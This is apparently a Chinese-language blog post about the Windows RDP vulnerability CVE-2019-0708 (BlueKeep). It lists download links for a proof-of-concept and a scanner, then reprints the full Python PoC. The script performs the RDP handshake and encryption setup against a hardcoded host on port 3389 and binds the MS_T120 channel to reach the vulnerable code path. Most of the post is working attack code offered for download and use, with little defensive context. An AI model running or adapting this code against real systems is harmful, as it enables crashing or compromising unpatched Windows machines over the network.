又是3389..... 而且听说是无身份验证,可蠕虫化。
根据历年经验,这个漏洞估计已经被用了很久了。
2019年5月14日微软官方发布安全补丁,修复了Windows远程桌面服务的远程代码执行漏洞CVE-2019-0708
(https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-0708)
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
CVE-2019-0708-POC
GitHub下载地址:
https://github.com/digital-missiles/CVE-2019-0708-PoC-Hitting-Path
CSDN下载地址:
https://download.csdn.net/download/sun1318578251/11189621
百度网盘下载地址:
链接:https://pan.baidu.com/s/1n1lWnNOxg_I0zt_g5SFeww
提取码:3aem
蓝奏云下载地址:
https://www.lanzous.com/i48owbe
360公司_RDP漏洞[ CVE-2019-0708 ]无损扫描工具(解压密码:360):
百度网盘下载地址:
链接:https://pan.baidu.com/s/1xun0YE2ZRIwVV67jMl6Lyw
提取码:qt83
蓝奏云下载地址:
https://www.lanzous.com/i48owad
CSDN下载地址:
https://download.csdn.net/download/sun1318578251/11190745
++++++++++++++++++++++++++++++++++++++++++++++++
POC源码:
#CVE-2019-0708
#the most worst PoC for only hitting vulnerable path NOT DOS!!!!! by Mateusz Garncarek
#https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-rdpbcgr/e78db616-689f-4b8a-8a99-525f7a433ee2
#https://winprotocoldoc.blob.core.windows.net/productionwindowsarchives/MS-RDPBCGR/%5bMS-RDPBCGR%5d.pdf
import socket
import sys
import struct
import hashlib
def macData(macSaltKey, data):
"""
@see: http://msdn.microsoft.com/en-us/library/cc241995.aspx
@param macSaltKey: {str} mac key
@param data: {str} data to sign
@return: {str} signature
"""
sha1Digest = hashlib.sha1()
md5Digest = hashlib.md5()
#encode length
dataLength = len(data)
dataLength = struct.pack('<I',dataLength)
b36 = b"\x36" * 40
sha1Digest.update(macSaltKey)
sha1Digest.update(b36)
sha1Digest.update(dataLength)
sha1Digest.update(data)
sha1Sig = sha1Digest.digest()
b5c = b"\x5c" * 48
md5Digest.update(macSaltKey)
md5Digest.update(b5c)
md5Digest.update(sha1Sig)
return md5Digest.digest()
def crypt(key, data):
S = list(range(256))
j = 0
for i in list(range(256)):
j = (j + S[i] + ord(key[i % len(key)])) % 256
S[i], S[j] = S[j], S[i]
j = 0
y = 0
out = []
for char in data:
j = (j + 1) % 256
y = (y + S[j]) % 256
S[j], S[y] = S[y], S[j]
out.append(chr(ord(char) ^ S[(S[j] + S[y]) % 256]))
return ''.join(out)
def SaltedHash(Secret, I,client_random,server_random):
md5 = hashlib.md5()
sha1 = hashlib.sha1()
Secretb = bytearray()
Secretb.extend(map(ord, Secret))
Ib = bytearray()
Ib.extend(map(ord, I))
client_randomb = bytearray()
client_randomb.extend(map(ord, client_random))
server_randomb = bytearray()
server_randomb.extend(map(ord, server_random))
sha1.update(Ib+Secretb+client_randomb+server_randomb)
md5.update(Secretb+sha1.digest())
return md5.digest()
def finalHash(key, client_random, server_random):
"""
@summary: MD5(in0[:16] + in1[:32] + in2[:32])
@param key: in 16
@param random1: in 32
@param random2: in 32
@return MD5(in0[:16] + in1[:32] + in2[:32])
"""
client_randomb = bytearray()
client_randomb.extend(map(ord, client_random))
server_randomb = bytearray()
server_randomb.extend(map(ord, server_random))
md5Digest = md5 = hashlib.md5()
md5Digest.update(key)
md5Digest.update(client_randomb)
md5Digest.update(server_randomb)
return md5Digest.digest()
#Hardcoded Client Info PDU
packet_to_encrypt = b""
packet_to_encrypt +=b"\x00\x00\x00\x00\x5B\x01\x01\x00\x00\x00\x08\x00\x08\x00\x00"
packet_to_encrypt +=b"\x00\x00\x00\x00\x00\x74\x00\x65\x00\x73\x00\x74\x00\x00\x00"
packet_to_encrypt +=b"\x74\x00\x65\x00\x73\x00\x74\x00\x00\x00\x00\x00\x00\x00\x02"
packet_to_encrypt +=b"\x00\x02\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00"
packet_to_encrypt +=b"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
packet_to_encrypt +=b"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
packet_to_encrypt +=b"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
packet_to_encrypt +=b"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
packet_to_encrypt +=b"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
packet_to_encrypt +=b"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
packet_to_encrypt +=b"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
packet_to_encrypt +=b"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
packet_to_encrypt +=b"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
packet_to_encrypt +=b"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
packet_to_encrypt +=b"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
packet_to_encrypt +=b"\x00\x00\x00\x00\x00\x00\x00\x00\x00"
client_random = b""
client_random += b"\xff\xee\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
client_random += b"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff"
host = '192.168.195.131'
port = 3389
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host, port))
received_data = ""
packet1 = b"\x03\x00\x00\x13\x0e\xe0\x00\x00\x00\x00\x00\x01\x00\x08\x00\x00\x00\x00\x00"
s.send(packet1)
received_data = s.recv(10024)
print("1st packet sent")
#Initial PDU with GCC Conference Create Request
PDU = "\x03\x00\x01\xca\x02\xf0\x80\x7f\x65\x82\x01\xb2\x04\x01"
PDU += "\x01\x04\x01\x01\x01\x01\xff\x30\x19\x02\x01\x22\x02\x01\x02\x02\x01\x00\x02"
PDU += "\x01\x01\x02\x01\x00\x02\x01\x01\x02\x02\xff\xff\x02\x01\x02\x30\x19\x02\x01"
PDU += "\x01\x02\x01\x01\x02\x01\x01\x02\x01\x01\x02\x01\x00\x02\x01\x01\x02\x02\x04"
PDU += "\x20\x02\x01\x02\x30\x1c\x02\x02\xff\xff\x02\x02\xfc\x17\x02\x02\xff\xff\x02"
PDU += "\x01\x01\x02\x01\x00\x02\x01\x01\x02\x02\xff\xff\x02\x01\x02\x04\x82\x01\x51"
PDU += "\x00\x05\x00\x14\x7c\x00\x01\x81\x48\x00\x08\x00\x10\x00\x01\xc0\x00\x44\x75"
PDU += "\x63\x61\x81\x3a\x01\xc0\xea\x00\x0b\x00\x08\x00\x80\x07\x38\x04\x01\xca\x03"
PDU += "\xaa\x15\x04\x00\x00\x63\x45\x00\x00\x44\x00\x45\x00\x53\x00\x4b\x00\x54\x00"
PDU += "\x4f\x00\x50\x00\x2d\x00\x37\x00\x39\x00\x46\x00\x56\x00\x56\x00\x30\x00\x43"
PDU += "\x00\x00\x00\x07\x00\x00\x00\x00\x00\x00\x00\x0c\x00\x00\x00\x00\x00\x00\x00"
PDU += "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
PDU += "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
PDU += "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
PDU += "\x00\x00\x00\x01\xca\x01\x00\x00\x00\x00\x00\x18\x00\x0f\x00\xaf\x07\x35\x00"
PDU += "\x65\x00\x37\x00\x37\x00\x63\x00\x33\x00\x39\x00\x35\x00\x2d\x00\x66\x00\x30"
PDU += "\x00\x37\x00\x32\x00\x2d\x00\x34\x00\x63\x00\x37\x00\x36\x00\x2d\x00\x62\x00"
PDU += "\x31\x00\x65\x00\x63\x00\x2d\x00\x66\x00\x36\x00\x32\x00\x66\x00\x65\x00\x37"
PDU += "\x00\x33\x00\x00\x00\x07\x00\x00\x00\x00\x00\x58\x01\x00\x00\xc1\x00\x00\x00"
PDU += "\x00\x00\x64\x00\x00\x00\x64\x00\x00\x00\x04\xc0\x0c\x00\x15\x00\x00\x00\x00"
PDU += "\x00\x00\x00\x02\xc0\x0c\x00\x1b\x00\x00\x00\x00\x00\x00\x00\x03\xc0\x38\x00"
#count of channels
PDU += "\x06\x00\x00\x00"
#channels
PDU += "rdpdr" + "\x00\x00\x00" + "\x00\x00\x80\x80"
PDU += "rdpsnd"+"\x00\x00" + "\x00\x00\x00\xc0"
PDU += "cliprdr"+ "\x00"+ "\x00\x00\xa0\xc0"
PDU += "AAAAAAA" + "\x00" + "\x00\x00\x00\x80"
PDU += "MS_T120" + "\x00" + "\x00\x00\x00\x80"
PDU += "drdynvc" + "\x00"+ "\x00\x00\x80\xc0"
length_packet = len(PDU)
print(length_packet)
#stupid calculating length for ASN.1 xD
ber = length_packet-12
ber2 = length_packet-109
ber3 = length_packet-118
ber4 = length_packet-132
ber5 = length_packet-390
length_packetb = struct.pack(">h", length_packet)
berb = length_packet = struct.pack(">h", ber)
ber2b = length_packet = struct.pack(">h", ber2)
ber3b = length_packet = struct.pack(">h", ber3)
ber4b = length_packet = struct.pack(">h", ber4)
ber5b = length_packet = struct.pack(">h", ber5)
#even more worse calculating length for ASN.1 xD
PDU_b = bytearray()
PDU_b.extend(map(ord, PDU))
PDU_b[2] = length_packetb[0]
PDU_b[3] = length_packetb[1]
PDU_b[10] = berb[0]
PDU_b[11] = berb[1]
PDU_b[107] = ber2b[0]
PDU_b[108] = ber2b[1]
#hardcoded high part of length xDDDDDDDDd
PDU_b[116] = 0x81
PDU_b[117] = ber3b[1]
#hardcoded high part of length xDDDDDDDDd
PDU_b[130] = 0x81
PDU_b[131] = ber4b[1]
PDU_b[392] = ber5b[1]
s.send(PDU_b)
received_data = s.recv(1024)
#more hardcoded things xDDDDDDDDd
server_random = received_data[121:153]
modulus = received_data[189:253]
public_exponent = received_data[185:189]
#print(modulus)
print("Initial PDU sent")
#modulus_b = bytearray()
#modulus_b.extend(map(ord, modulus))
#Obtaining things for RSA
modulus = int.from_bytes(modulus, byteorder='little')
public_exponent = int.from_bytes(public_exponent, byteorder='little')
client_random = int.from_bytes(client_random, byteorder='little')
#Encrypting client radom
encrypted_client_random = pow(client_random,public_exponent,modulus )
encrypted_client_random = encrypted_client_random.to_bytes(64, byteorder='little')
####Begin of connecting virtual channels, it's also hardcoded xD
packet3 = b"\x03\x00\x00\x0c\x02\xf0\x80\x04\x01\x00\x01\x00"
s.send(packet3)
print("3rd packet sent")
packet4 = b"\x03\x00\x00\x08\x02\xf0\x80\x28"
s.send(packet4)
received_data = s.recv(1024)
print("4th packet sent")
packet5 = b"\x03\x00\x00\x0c\x02\xf0\x80\x38\x00\x08\x03\xf1"
s.send(packet5)
received_data = s.recv(1024)
print("5th packet sent")
packet6 = b"\x03\x00\x00\x0c\x02\xf0\x80\x38\x00\x08\x03\xeb"
s.send(packet6)
received_data = s.recv(1024)
print("6th packet sent")
packet7 = b"\x03\x00\x00\x0c\x02\xf0\x80\x38\x00\x08\x03\xec"
s.send(packet7)
received_data = s.recv(1024)
packet8 = b"\x03\x00\x00\x0c\x02\xf0\x80\x38\x00\x08\x03\xed"
s.send(packet8)
received_data = s.recv(1024)
packet9 = b"\x03\x00\x00\x0c\x02\xf0\x80\x38\x00\x08\x03\xee"
s.send(packet9)
received_data = s.recv(1024)
packet10 = b"\x03\x00\x00\x0c\x02\xf0\x80\x38\x00\x08\x03\xef"
s.send(packet10)
received_data = s.recv(1024)
packet11= b"\x03\x00\x00\x0c\x02\xf0\x80\x38\x00\x08\x03\xf0"
s.send(packet11)
received_data = s.recv(1024)
###########End of connecting virtual channels
#Client Security Exchange PDU
PDU_Security_Exchange = b"\x03\x00\x00\x5e\x02\xf0\x80\x64\x00\x08\x03\xeb\x70\x50\x01\x02\x00\x00\x48\x00\x00\x00"
PDU_Security_Exchange += encrypted_client_random
PDU_Security_Exchange += b"\x00\x00\x00\x00\x00\x00\x00\x00"
client_random = client_random.to_bytes(32, byteorder='little')
client_random = "".join(map(chr, client_random))
server_random = "".join(map(chr, server_random))
#Calculating hashes and things for RC4 encryption it's only done for 128BIT RC4
PreMasterSecret = client_random[:24] + server_random[:24]
MasterSecret = SaltedHash(PreMasterSecret,"A",client_random,server_random) + SaltedHash(PreMasterSecret,"BB",client_random,server_random) + SaltedHash(PreMasterSecret,"CCC",client_random,server_random)
MasterSecret = "".join(map(chr, MasterSecret))
SessionKeyBlob = SaltedHash(MasterSecret,"X",client_random,server_random) + SaltedHash(MasterSecret,"YY",client_random,server_random) + SaltedHash(MasterSecret,"ZZZ",client_random,server_random)
FinalClientEncryptKey128 = SessionKeyBlob[32:48]
FinalClientEncryptKey128 = finalHash(FinalClientEncryptKey128,client_random,server_random)
print(':'.join(hex(x)[2:] for x in FinalClientEncryptKey128))
MACKey128 = SessionKeyBlob[:16]
#print(':'.join(hex(x)[2:] for x in MACKey128))
FinalClientEncryptKey128 = "".join(map(chr, FinalClientEncryptKey128))
FinalMac128 = macData(MACKey128, packet_to_encrypt)[:8]
packet_to_encrypt = "".join(map(chr, packet_to_encrypt))
encrypted_packet = crypt(FinalClientEncryptKey128,packet_to_encrypt)
encrypted_packetb = bytearray()
encrypted_packetb.extend(map(ord, encrypted_packet))
#print(':'.join(hex(ord(x))[2:] for x in encrypted_packet))
#Client Info PDU together with #Client Security Exchange PDU
Client_Info_PDU = b""
Client_Info_PDU += PDU_Security_Exchange
Client_Info_PDU += b"\x03\x00\x01\x05\x02\xf0\x80\x64\x00\x03\x03\xeb\x70\x80\xf6\x48\x00\x00\x00"
Client_Info_PDU += FinalMac128
Client_Info_PDU += encrypted_packetb
s.send(Client_Info_PDU)
received_data = s.recv(1024)
print("Last packet sent")
